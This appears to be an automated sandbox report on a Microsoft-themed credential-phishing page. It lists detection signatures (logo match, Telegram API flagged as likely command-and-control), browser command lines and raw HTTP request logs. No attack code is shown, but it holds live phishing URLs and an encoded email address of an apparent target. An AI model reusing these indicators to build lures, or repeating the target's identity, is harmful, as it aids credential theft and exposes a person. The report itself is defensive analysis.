Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz

Overview

General Information

Sample URL:https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz
Analysis ID:1542143
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Uses the Telegram API (likely for C&C communication)

Classification

  • System is w10x64
  • chrome.exe (PID: 5940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,10506442713732775358,2264122065710547081,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzMatcher: Found strong image similarity, brand: MICROSOFT
Source: https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzMatcher: Template: microsoft matched
Source: https://ipfox.co.uk/Captcha-Onedrive2024-8281969Matcher: Template: microsoft matched
Source: https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzHTTP Parser: No favicon
Source: https://ipfox.co.uk/Captcha-Onedrive2024-8281969HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49921 version: TLS 1.2

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: global trafficHTTP traffic detected: GET /pages/thanks.html HTTP/1.1Host: ipfox.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pages/errorss.js HTTP/1.1Host: ipfox.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ipfox.co.uk/pages/thanks.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/UAParser.js/0.7.31/ua-parser.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /botd/v1 HTTP/1.1Host: openfpcdn.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ipfox.co.uksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ipfox.co.ukSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ag.state.mn.us HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ipfox.co.ukSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/UAParser.js/0.7.31/ua-parser.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ipfox.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfox.co.uk/pages/thanks.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pages/errorss.js HTTP/1.1Host: ipfox.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /botd/v1 HTTP/1.1Host: openfpcdn.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ag.state.mn.us HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ipfox.co.ukSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=76n2YYww4aHFrFc&MD=O4CPbXYe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=76n2YYww4aHFrFc&MD=O4CPbXYe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
